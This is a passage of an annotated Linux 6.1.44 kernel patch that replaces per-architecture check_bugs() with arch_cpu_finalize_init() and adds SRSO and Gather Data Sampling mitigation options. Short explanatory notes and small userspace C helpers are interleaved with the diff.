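	/* the value runs until the next space or end of line */
	printf("%s%.*s\n", opt, (int)strcspn(v, " \n"), v);
}

int main(void)
{
	char buf[4096] = "";
	FILE *f = fopen("/proc/cmdline", "r");

	if (f) {
		if (!fgets(buf, sizeof(buf), f))
			buf[0] = '\0';
		fclose(f);
	}
	print_opt(buf, "spec_rstack_overflow=");
	print_opt(buf, "gather_data_sampling=");
	return 0;
}
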
+diff --git a/Makefile b/Makefile
+index 69cdd0d2946c3..612f3d83629b4 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 43
++SUBLEVEL = 44
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index 81599f5c17b0f..b60d271bf76a9 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -285,6 +285,9 @@ config ARCH_HAS_DMA_SET_UNCACHED
+ config ARCH_HAS_DMA_CLEAR_UNCACHED
+ 	bool
+ 
++config ARCH_HAS_CPU_FINALIZE_INIT
++	bool
++
+ # Select if arch init_task must go in the __init_task_data section
+ config ARCH_TASK_STRUCT_ON_STACK
+ 	bool
+diff --git a/arch/alpha/include/asm/bugs.h b/arch/alpha/include/asm/bugs.h
+deleted file mode 100644
+index 78030d1c7e7e0..0000000000000
+--- a/arch/alpha/include/asm/bugs.h
++++ /dev/null
+@@ -1,20 +0,0 @@
+-/*
+- *  include/asm-alpha/bugs.h
+- *
+- *  Copyright (C) 1994  Linus Torvalds
+- */
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-/*
+- * I don't know of any alpha bugs yet.. Nice chip
+- */
+-
+-static void check_bugs(void)
+-{
+-}
+diff --git a/arch/arm/Kconfig b/arch/arm/Kconfig
+index 0202e48e7a207..6d5afe2e6ba33 100644
+--- a/arch/arm/Kconfig
++++ b/arch/arm/Kconfig
+@@ -5,6 +5,7 @@ config ARM
+ 	select ARCH_32BIT_OFF_T
+ 	select ARCH_CORRECT_STACKTRACE_ON_KRETPROBE if HAVE_KRETPROBES && FRAME_POINTER && !ARM_UNWIND
+ 	select ARCH_HAS_BINFMT_FLAT
++	select ARCH_HAS_CPU_FINALIZE_INIT if MMU
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_DEBUG_VIRTUAL if MMU
+ 	select ARCH_HAS_DMA_WRITE_COMBINE if !ARM_DMA_MEM_BUFFERABLE
+diff --git a/arch/arm/include/asm/bugs.h b/arch/arm/include/asm/bugs.h
+index 97a312ba08401..fe385551edeca 100644
+--- a/arch/arm/include/asm/bugs.h
++++ b/arch/arm/include/asm/bugs.h
+@@ -1,7 +1,5 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- *  arch/arm/include/asm/bugs.h
+- *
+  *  Copyright (C) 1995-2003 Russell King
+  */
+ #ifndef __ASM_BUGS_H
+@@ -10,10 +8,8 @@
+ extern void check_writebuffer_bugs(void);
+ 
+ #ifdef CONFIG_MMU
+-extern void check_bugs(void);
+ extern void check_other_bugs(void);
+ #else
+-#define check_bugs() do { } while (0)
+ #define check_other_bugs() do { } while (0)
+ #endif
+ 
+diff --git a/arch/arm/kernel/bugs.c b/arch/arm/kernel/bugs.c
+index 14c8dbbb7d2df..087bce6ec8e9b 100644
+--- a/arch/arm/kernel/bugs.c
++++ b/arch/arm/kernel/bugs.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/init.h>
++#include <linux/cpu.h>
+ #include <asm/bugs.h>
+ #include <asm/proc-fns.h>
+ 
+@@ -11,7 +12,7 @@ void check_other_bugs(void)
+ #endif
+ }
+ 
+-void __init check_bugs(void)
++void __init arch_cpu_finalize_init(void)
+ {
+ 	check_writebuffer_bugs();
+ 	check_other_bugs();
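
The ARM hunk above sets the pattern the rest of the series repeats for
ia64, loongarch, m68k, MIPS, SH, sparc32, UML and x86: each private
check_bugs() becomes arch_cpu_finalize_init(), gated by the new
ARCH_HAS_CPU_FINALIZE_INIT symbol, while alpha, parisc and powerpc simply
lose their stub headers. The generic fallback lives in init/main.c,
outside this excerpt; a sketch of the weak-default idiom it relies on:

/* Architectures selecting ARCH_HAS_CPU_FINALIZE_INIT override the weak
 * symbol; everyone else silently gets the empty default.
 */
#include <linux/cpu.h>
#include <linux/init.h>

void __init __weak arch_cpu_finalize_init(void)
{
}
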
+diff --git a/arch/ia64/Kconfig b/arch/ia64/Kconfig
+index c6e06cdc738f0..283b751cbf6ab 100644
+--- a/arch/ia64/Kconfig
++++ b/arch/ia64/Kconfig
+@@ -9,6 +9,7 @@ menu "Processor type and features"
+ config IA64
+ 	bool
+ 	select ARCH_BINFMT_ELF_EXTRA_PHDRS
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_DMA_MARK_CLEAN
+ 	select ARCH_HAS_STRNCPY_FROM_USER
+ 	select ARCH_HAS_STRNLEN_USER
+diff --git a/arch/ia64/include/asm/bugs.h b/arch/ia64/include/asm/bugs.h
+deleted file mode 100644
+index 0d6b9bded56c6..0000000000000
+--- a/arch/ia64/include/asm/bugs.h
++++ /dev/null
+@@ -1,20 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- *
+- * Based on <asm-alpha/bugs.h>.
+- *
+- * Modified 1998, 1999, 2003
+- *	David Mosberger-Tang <davidm@hpl.hp.com>,  Hewlett-Packard Co.
+- */
+-#ifndef _ASM_IA64_BUGS_H
+-#define _ASM_IA64_BUGS_H
+-
+-#include <asm/processor.h>
+-
+-extern void check_bugs (void);
+-
+-#endif /* _ASM_IA64_BUGS_H */
+diff --git a/arch/ia64/kernel/setup.c b/arch/ia64/kernel/setup.c
+index c057280442727..9009f1871e3b8 100644
+--- a/arch/ia64/kernel/setup.c
++++ b/arch/ia64/kernel/setup.c
+@@ -1067,8 +1067,7 @@ cpu_init (void)
+ 	}
+ }
+ 
+-void __init
+-check_bugs (void)
++void __init arch_cpu_finalize_init(void)
+ {
+ 	ia64_patch_mckinley_e9((unsigned long) __start___mckinley_e9_bundles,
+ 			       (unsigned long) __end___mckinley_e9_bundles);
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index e737dc8cd660c..270742cc3ca49 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -10,6 +10,7 @@ config LOONGARCH
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_TICK_BROADCAST if GENERIC_CLOCKEVENTS_BROADCAST
+diff --git a/arch/loongarch/kernel/setup.c b/arch/loongarch/kernel/setup.c
+index ae436def7ee98..29725b37b35ca 100644
+--- a/arch/loongarch/kernel/setup.c
++++ b/arch/loongarch/kernel/setup.c
+@@ -12,6 +12,7 @@
+  */
+ #include <linux/init.h>
+ #include <linux/acpi.h>
++#include <linux/cpu.h>
+ #include <linux/dmi.h>
+ #include <linux/efi.h>
+ #include <linux/export.h>
+@@ -80,6 +81,11 @@ const char *get_system_type(void)
+ 	return "generic-loongson-machine";
+ }
+ 
++void __init arch_cpu_finalize_init(void)
++{
++	alternative_instructions();
++}
++
+ static const char *dmi_string_parse(const struct dmi_header *dm, u8 s)
+ {
+ 	const u8 *bp = ((u8 *) dm) + dm->length;
+diff --git a/arch/m68k/Kconfig b/arch/m68k/Kconfig
+index 7bff881185070..1fe5b20187457 100644
+--- a/arch/m68k/Kconfig
++++ b/arch/m68k/Kconfig
+@@ -4,6 +4,7 @@ config M68K
+ 	default y
+ 	select ARCH_32BIT_OFF_T
+ 	select ARCH_HAS_BINFMT_FLAT
++	select ARCH_HAS_CPU_FINALIZE_INIT if MMU
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_DMA_PREP_COHERENT if HAS_DMA && MMU && !COLDFIRE
+ 	select ARCH_HAS_SYNC_DMA_FOR_DEVICE if HAS_DMA
+diff --git a/arch/m68k/include/asm/bugs.h b/arch/m68k/include/asm/bugs.h
+deleted file mode 100644
+index 745530651e0bf..0000000000000
+--- a/arch/m68k/include/asm/bugs.h
++++ /dev/null
+@@ -1,21 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *  include/asm-m68k/bugs.h
+- *
+- *  Copyright (C) 1994  Linus Torvalds
+- */
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-#ifdef CONFIG_MMU
+-extern void check_bugs(void);	/* in arch/m68k/kernel/setup.c */
+-#else
+-static void check_bugs(void)
+-{
+-}
+-#endif
+diff --git a/arch/m68k/kernel/setup_mm.c b/arch/m68k/kernel/setup_mm.c
+index fbff1cea62caa..6f1ae01f322cf 100644
+--- a/arch/m68k/kernel/setup_mm.c
++++ b/arch/m68k/kernel/setup_mm.c
+@@ -10,6 +10,7 @@
+  */
+ 
+ #include <linux/kernel.h>
++#include <linux/cpu.h>
+ #include <linux/mm.h>
+ #include <linux/sched.h>
+ #include <linux/delay.h>
+@@ -504,7 +505,7 @@ static int __init proc_hardware_init(void)
+ module_init(proc_hardware_init);
+ #endif
+ 
+-void check_bugs(void)
++void __init arch_cpu_finalize_init(void)
+ {
+ #if defined(CONFIG_FPU) && !defined(CONFIG_M68KFPU_EMU)
+ 	if (m68k_fputype == 0) {
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index 7b0856c76c9ad..cf1fbf4eaa8a0 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -4,6 +4,7 @@ config MIPS
+ 	default y
+ 	select ARCH_32BIT_OFF_T if !64BIT
+ 	select ARCH_BINFMT_ELF_STATE if MIPS_FP_SUPPORT
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_CURRENT_STACK_POINTER if !CC_IS_CLANG || CLANG_VERSION >= 140000
+ 	select ARCH_HAS_DEBUG_VIRTUAL if !64BIT
+ 	select ARCH_HAS_FORTIFY_SOURCE
+diff --git a/arch/mips/include/asm/bugs.h b/arch/mips/include/asm/bugs.h
+index d72dc6e1cf3cd..8d4cf29861b87 100644
+--- a/arch/mips/include/asm/bugs.h
++++ b/arch/mips/include/asm/bugs.h
+@@ -1,17 +1,11 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ /*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+  * Copyright (C) 2007  Maciej W. Rozycki
+- *
+- * Needs:
+- *	void check_bugs(void);
+  */
+ #ifndef _ASM_BUGS_H
+ #define _ASM_BUGS_H
+ 
+ #include <linux/bug.h>
+-#include <linux/delay.h>
+ #include <linux/smp.h>
+ 
+ #include <asm/cpu.h>
+@@ -30,17 +24,6 @@ static inline void check_bugs_early(void)
+ 		check_bugs64_early();
+ }
+ 
+-static inline void check_bugs(void)
+-{
+-	unsigned int cpu = smp_processor_id();
+-
+-	cpu_data[cpu].udelay_val = loops_per_jiffy;
+-	check_bugs32();
+-
+-	if (IS_ENABLED(CONFIG_CPU_R4X00_BUGS64))
+-		check_bugs64();
+-}
+-
+ static inline int r4k_daddiu_bug(void)
+ {
+ 	if (!IS_ENABLED(CONFIG_CPU_R4X00_BUGS64))
+diff --git a/arch/mips/kernel/setup.c b/arch/mips/kernel/setup.c
+index 81dbb4ef52317..7c540572f1f72 100644
+--- a/arch/mips/kernel/setup.c
++++ b/arch/mips/kernel/setup.c
+@@ -11,6 +11,8 @@
+  * Copyright (C) 2000, 2001, 2002, 2007	 Maciej W. Rozycki
+  */
+ #include <linux/init.h>
++#include <linux/cpu.h>
++#include <linux/delay.h>
+ #include <linux/ioport.h>
+ #include <linux/export.h>
+ #include <linux/screen_info.h>
+@@ -840,3 +842,14 @@ static int __init setnocoherentio(char *str)
+ }
+ early_param("nocoherentio", setnocoherentio);
+ #endif
++
++void __init arch_cpu_finalize_init(void)
++{
++	unsigned int cpu = smp_processor_id();
++
++	cpu_data[cpu].udelay_val = loops_per_jiffy;
++	check_bugs32();
++
++	if (IS_ENABLED(CONFIG_CPU_R4X00_BUGS64))
++		check_bugs64();
++}
+diff --git a/arch/parisc/include/asm/bugs.h b/arch/parisc/include/asm/bugs.h
+deleted file mode 100644
+index 0a7f9db6bd1c7..0000000000000
+--- a/arch/parisc/include/asm/bugs.h
++++ /dev/null
+@@ -1,20 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *  include/asm-parisc/bugs.h
+- *
+- *  Copyright (C) 1999	Mike Shaver
+- */
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-#include <asm/processor.h>
+-
+-static inline void check_bugs(void)
+-{
+-//	identify_cpu(&boot_cpu_data);
+-}
+diff --git a/arch/powerpc/include/asm/bugs.h b/arch/powerpc/include/asm/bugs.h
+deleted file mode 100644
+index 01b8f6ca4dbbc..0000000000000
+--- a/arch/powerpc/include/asm/bugs.h
++++ /dev/null
+@@ -1,15 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-#ifndef _ASM_POWERPC_BUGS_H
+-#define _ASM_POWERPC_BUGS_H
+-
+-/*
+- */
+-
+-/*
+- * This file is included by 'init/main.c' to check for
+- * architecture-dependent bugs.
+- */
+-
+-static inline void check_bugs(void) { }
+-
+-#endif	/* _ASM_POWERPC_BUGS_H */
+diff --git a/arch/sh/Kconfig b/arch/sh/Kconfig
+index 8e4d1f757bcc9..a0593f6ce0e0f 100644
+--- a/arch/sh/Kconfig
++++ b/arch/sh/Kconfig
+@@ -7,6 +7,7 @@ config SUPERH
+ 	select ARCH_HAVE_CUSTOM_GPIO_H
+ 	select ARCH_HAVE_NMI_SAFE_CMPXCHG if (GUSA_RB || CPU_SH4A)
+ 	select ARCH_HAS_BINFMT_FLAT if !MMU
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_GIGANTIC_PAGE
+ 	select ARCH_HAS_GCOV_PROFILE_ALL
+diff --git a/arch/sh/include/asm/bugs.h b/arch/sh/include/asm/bugs.h
+deleted file mode 100644
+index fe52abb69cea3..0000000000000
+--- a/arch/sh/include/asm/bugs.h
++++ /dev/null
+@@ -1,74 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __ASM_SH_BUGS_H
+-#define __ASM_SH_BUGS_H
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-/*
+- * I don't know of any Super-H bugs yet.
+- */
+-
+-#include <asm/processor.h>
+-
+-extern void select_idle_routine(void);
+-
+-static void __init check_bugs(void)
+-{
+-	extern unsigned long loops_per_jiffy;
+-	char *p = &init_utsname()->machine[2]; /* "sh" */
+-
+-	select_idle_routine();
+-
+-	current_cpu_data.loops_per_jiffy = loops_per_jiffy;
+-
+-	switch (current_cpu_data.family) {
+-	case CPU_FAMILY_SH2:
+-		*p++ = '2';
+-		break;
+-	case CPU_FAMILY_SH2A:
+-		*p++ = '2';
+-		*p++ = 'a';
+-		break;
+-	case CPU_FAMILY_SH3:
+-		*p++ = '3';
+-		break;
+-	case CPU_FAMILY_SH4:
+-		*p++ = '4';
+-		break;
+-	case CPU_FAMILY_SH4A:
+-		*p++ = '4';
+-		*p++ = 'a';
+-		break;
+-	case CPU_FAMILY_SH4AL_DSP:
+-		*p++ = '4';
+-		*p++ = 'a';
+-		*p++ = 'l';
+-		*p++ = '-';
+-		*p++ = 'd';
+-		*p++ = 's';
+-		*p++ = 'p';
+-		break;
+-	case CPU_FAMILY_UNKNOWN:
+-		/*
+-		 * Specifically use CPU_FAMILY_UNKNOWN rather than
+-		 * default:, so we're able to have the compiler whine
+-		 * about unhandled enumerations.
+-		 */
+-		break;
+-	}
+-
+-	printk("CPU: %s\n", get_cpu_subtype(&current_cpu_data));
+-
+-#ifndef __LITTLE_ENDIAN__
+-	/* 'eb' means 'Endian Big' */
+-	*p++ = 'e';
+-	*p++ = 'b';
+-#endif
+-	*p = '\0';
+-}
+-#endif /* __ASM_SH_BUGS_H */
+diff --git a/arch/sh/include/asm/processor.h b/arch/sh/include/asm/processor.h
+index 85a6c1c3c16e7..73fba7c922f92 100644
+--- a/arch/sh/include/asm/processor.h
++++ b/arch/sh/include/asm/processor.h
+@@ -166,6 +166,8 @@ extern unsigned int instruction_size(unsigned int insn);
+ #define instruction_size(insn)	(2)
+ #endif
+ 
++void select_idle_routine(void);
++
+ #endif /* __ASSEMBLY__ */
+ 
+ #include <asm/processor_32.h>
+diff --git a/arch/sh/kernel/idle.c b/arch/sh/kernel/idle.c
+index f59814983bd59..a80b2a5b25c7f 100644
+--- a/arch/sh/kernel/idle.c
++++ b/arch/sh/kernel/idle.c
+@@ -14,6 +14,7 @@
+ #include <linux/irqflags.h>
+ #include <linux/smp.h>
+ #include <linux/atomic.h>
++#include <asm/processor.h>
+ #include <asm/smp.h>
+ #include <asm/bl_bit.h>
+ 
+diff --git a/arch/sh/kernel/setup.c b/arch/sh/kernel/setup.c
+index af977ec4ca5e5..cf7c0f72f2935 100644
+--- a/arch/sh/kernel/setup.c
++++ b/arch/sh/kernel/setup.c
+@@ -43,6 +43,7 @@
+ #include <asm/smp.h>
+ #include <asm/mmu_context.h>
+ #include <asm/mmzone.h>
++#include <asm/processor.h>
+ #include <asm/sparsemem.h>
+ #include <asm/platform_early.h>
+ 
+@@ -354,3 +355,57 @@ int test_mode_pin(int pin)
+ {
+ 	return sh_mv.mv_mode_pins() & pin;
+ }
++
++void __init arch_cpu_finalize_init(void)
++{
++	char *p = &init_utsname()->machine[2]; /* "sh" */
++
++	select_idle_routine();
++
++	current_cpu_data.loops_per_jiffy = loops_per_jiffy;
++
++	switch (current_cpu_data.family) {
++	case CPU_FAMILY_SH2:
++		*p++ = '2';
++		break;
++	case CPU_FAMILY_SH2A:
++		*p++ = '2';
++		*p++ = 'a';
++		break;
++	case CPU_FAMILY_SH3:
++		*p++ = '3';
++		break;
++	case CPU_FAMILY_SH4:
++		*p++ = '4';
++		break;
++	case CPU_FAMILY_SH4A:
++		*p++ = '4';
++		*p++ = 'a';
++		break;
++	case CPU_FAMILY_SH4AL_DSP:
++		*p++ = '4';
++		*p++ = 'a';
++		*p++ = 'l';
++		*p++ = '-';
++		*p++ = 'd';
++		*p++ = 's';
++		*p++ = 'p';
++		break;
++	case CPU_FAMILY_UNKNOWN:
++		/*
++		 * Specifically use CPU_FAMILY_UNKNOWN rather than
++		 * default:, so we're able to have the compiler whine
++		 * about unhandled enumerations.
++		 */
++		break;
++	}
++
++	pr_info("CPU: %s\n", get_cpu_subtype(&current_cpu_data));
++
++#ifndef __LITTLE_ENDIAN__
++	/* 'eb' means 'Endian Big' */
++	*p++ = 'e';
++	*p++ = 'b';
++#endif
++	*p = '\0';
++}
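
The practical effect of the SH move is only visible through uname(2):
the machine string assembled above ends up as, e.g., "sh4a" on
little-endian or "sh4aeb" on big-endian parts. A small userspace check
(illustrative, not part of the patch):

#include <stdio.h>
#include <sys/utsname.h>

int main(void)
{
	struct utsname u;

	if (uname(&u) != 0) {
		perror("uname");
		return 1;
	}
	printf("machine: %s\n", u.machine);	/* e.g. "sh4aeb" */
	return 0;
}
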
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index dbb1760cbe8c9..b67d96e3392e5 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -51,6 +51,7 @@ config SPARC
+ config SPARC32
+ 	def_bool !64BIT
+ 	select ARCH_32BIT_OFF_T
++	select ARCH_HAS_CPU_FINALIZE_INIT if !SMP
+ 	select ARCH_HAS_SYNC_DMA_FOR_CPU
+ 	select CLZ_TAB
+ 	select DMA_DIRECT_REMAP
+diff --git a/arch/sparc/include/asm/bugs.h b/arch/sparc/include/asm/bugs.h
+deleted file mode 100644
+index 02fa369b9c21f..0000000000000
+--- a/arch/sparc/include/asm/bugs.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/* include/asm/bugs.h:  Sparc probes for various bugs.
+- *
+- * Copyright (C) 1996, 2007 David S. Miller (davem@davemloft.net)
+- */
+-
+-#ifdef CONFIG_SPARC32
+-#include <asm/cpudata.h>
+-#endif
+-
+-extern unsigned long loops_per_jiffy;
+-
+-static void __init check_bugs(void)
+-{
+-#if defined(CONFIG_SPARC32) && !defined(CONFIG_SMP)
+-	cpu_data(0).udelay_val = loops_per_jiffy;
+-#endif
+-}
+diff --git a/arch/sparc/kernel/setup_32.c b/arch/sparc/kernel/setup_32.c
+index c8e0dd99f3700..c9d1ba4f311b9 100644
+--- a/arch/sparc/kernel/setup_32.c
++++ b/arch/sparc/kernel/setup_32.c
+@@ -412,3 +412,10 @@ static int __init topology_init(void)
+ }
+ 
+ subsys_initcall(topology_init);
++
++#if defined(CONFIG_SPARC32) && !defined(CONFIG_SMP)
++void __init arch_cpu_finalize_init(void)
++{
++	cpu_data(0).udelay_val = loops_per_jiffy;
++}
++#endif
+diff --git a/arch/um/Kconfig b/arch/um/Kconfig
+index ad4ff3b0e91e5..82709bc36df7d 100644
+--- a/arch/um/Kconfig
++++ b/arch/um/Kconfig
+@@ -6,6 +6,7 @@ config UML
+ 	bool
+ 	default y
+ 	select ARCH_EPHEMERAL_INODES
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_FORTIFY_SOURCE
+ 	select ARCH_HAS_GCOV_PROFILE_ALL
+ 	select ARCH_HAS_KCOV
+diff --git a/arch/um/include/asm/bugs.h b/arch/um/include/asm/bugs.h
+deleted file mode 100644
+index 4473942a08397..0000000000000
+--- a/arch/um/include/asm/bugs.h
++++ /dev/null
+@@ -1,7 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __UM_BUGS_H
+-#define __UM_BUGS_H
+-
+-void check_bugs(void);
+-
+-#endif
+diff --git a/arch/um/kernel/um_arch.c b/arch/um/kernel/um_arch.c
+index 8adf8e89b2558..334c91191b316 100644
+--- a/arch/um/kernel/um_arch.c
++++ b/arch/um/kernel/um_arch.c
+@@ -3,6 +3,7 @@
+  * Copyright (C) 2000 - 2007 Jeff Dike (jdike@{addtoit,linux.intel}.com)
+  */
+ 
++#include <linux/cpu.h>
+ #include <linux/delay.h>
+ #include <linux/init.h>
+ #include <linux/mm.h>
+@@ -426,7 +427,7 @@ void __init setup_arch(char **cmdline_p)
+ 	}
+ }
+ 
+-void __init check_bugs(void)
++void __init arch_cpu_finalize_init(void)
+ {
+ 	arch_check_bugs();
+ 	os_check_bugs();
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index b3d5706579d43..4c9bfc4be58d4 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -69,6 +69,7 @@ config X86
+ 	select ARCH_ENABLE_THP_MIGRATION if X86_64 && TRANSPARENT_HUGEPAGE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
+ 	select ARCH_HAS_CACHE_LINE_SIZE
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_DEBUG_VIRTUAL
+ 	select ARCH_HAS_DEBUG_VM_PGTABLE	if !X86_PAE
+@@ -2511,6 +2512,13 @@ config CPU_IBRS_ENTRY
+ 	  This mitigates both spectre_v2 and retbleed at great cost to
+ 	  performance.
+ 
++config CPU_SRSO
++	bool "Mitigate speculative RAS overflow on AMD"
++	depends on CPU_SUP_AMD && X86_64 && RETHUNK
++	default y
++	help
++	  Enable the SRSO mitigation needed on AMD Zen1-4 machines.
++
+ config SLS
+ 	bool "Mitigate Straight-Line-Speculation"
+ 	depends on CC_HAS_SLS && X86_64
+@@ -2521,6 +2529,25 @@ config SLS
+ 	  against straight line speculation. The kernel image might be slightly
+ 	  larger.
+ 
++config GDS_FORCE_MITIGATION
++	bool "Force GDS Mitigation"
++	depends on CPU_SUP_INTEL
++	default n
++	help
++	  Gather Data Sampling (GDS) is a hardware vulnerability which allows
++	  unprivileged speculative access to data that was previously stored in
++	  vector registers.
++
++	  This option is equivalent to setting gather_data_sampling=force on the
++	  command line. The microcode mitigation is used if present, otherwise
++	  AVX is disabled as a mitigation. On affected systems that are missing
++	  the microcode any userspace code that unconditionally uses AVX will
++	  break with this option set.
++
++	  Setting this option on systems not vulnerable to GDS has no effect.
++
++	  If in doubt, say N.
++
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/include/asm/bugs.h b/arch/x86/include/asm/bugs.h
+index 92ae283899409..f25ca2d709d40 100644
+--- a/arch/x86/include/asm/bugs.h
++++ b/arch/x86/include/asm/bugs.h
+@@ -4,8 +4,6 @@
+ 
+ #include <asm/processor.h>
+ 
+-extern void check_bugs(void);
+-
+ #if defined(CONFIG_CPU_SUP_INTEL) && defined(CONFIG_X86_32)
+ int ppro_with_ram_bug(void);
+ #else
+diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h
+index 1a85e1fb09226..ce0c8f7d32186 100644
+--- a/arch/x86/include/asm/cpufeature.h
++++ b/arch/x86/include/asm/cpufeature.h
+@@ -32,6 +32,7 @@ enum cpuid_leafs
+ 	CPUID_8000_0007_EBX,
+ 	CPUID_7_EDX,
+ 	CPUID_8000_001F_EAX,
++	CPUID_8000_0021_EAX,
+ };
+ 
+ #define X86_CAP_FMT_NUM "%d:%d"
+@@ -94,8 +95,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 17, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 19, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 20, feature_bit) ||	\
+ 	   REQUIRED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 20))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
+ 
+ #define DISABLED_MASK_BIT_SET(feature_bit)				\
+ 	 ( CHECK_BIT_IN_MASK_WORD(DISABLED_MASK,  0, feature_bit) ||	\
+@@ -118,8 +120,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 17, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 19, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 20, feature_bit) ||	\
+ 	   DISABLED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 20))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
+ 
+ #define cpu_has(c, bit)							\
+ 	(__builtin_constant_p(bit) && REQUIRED_MASK_BIT_SET(bit) ? 1 :	\
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index 92729c38853d1..e721b8426c245 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -13,8 +13,8 @@
+ /*
+  * Defines x86 CPU feature bits
+  */
+-#define NCAPINTS			20	   /* N 32-bit words worth of info */
+-#define NBUGINTS			1	   /* N 32-bit bug flags */
++#define NCAPINTS			21	   /* N 32-bit words worth of info */
++#define NBUGINTS			2	   /* N 32-bit bug flags */
+ 
+ /*
+  * Note: If the comment begins with a quoted string, that string is used
+@@ -308,6 +308,10 @@
+ 
+ #define X86_FEATURE_MSR_TSX_CTRL	(11*32+20) /* "" MSR IA32_TSX_CTRL (Intel) implemented */
+ 
++#define X86_FEATURE_SRSO		(11*32+24) /* "" AMD BTB untrain RETs */
++#define X86_FEATURE_SRSO_ALIAS		(11*32+25) /* "" AMD BTB untrain RETs through aliasing */
++#define X86_FEATURE_IBPB_ON_VMEXIT	(11*32+26) /* "" Issue an IBPB only on VMEXIT */
++
+ /* Intel-defined CPU features, CPUID level 0x00000007:1 (EAX), word 12 */
+ #define X86_FEATURE_AVX_VNNI		(12*32+ 4) /* AVX VNNI instructions */
+ #define X86_FEATURE_AVX512_BF16		(12*32+ 5) /* AVX512 BFLOAT16 instructions */
+@@ -423,6 +427,10 @@
+ #define X86_FEATURE_V_TSC_AUX		(19*32+ 9) /* "" Virtual TSC_AUX */
+ #define X86_FEATURE_SME_COHERENT	(19*32+10) /* "" AMD hardware-enforced cache coherency */
+ 
++#define X86_FEATURE_SBPB		(20*32+27) /* "" Selective Branch Prediction Barrier */
++#define X86_FEATURE_IBPB_BRTYPE		(20*32+28) /* "" MSR_PRED_CMD[IBPB] flushes all branch type predictions */
++#define X86_FEATURE_SRSO_NO		(20*32+29) /* "" CPU is not affected by SRSO */
++
+ /*
+  * BUG word(s)
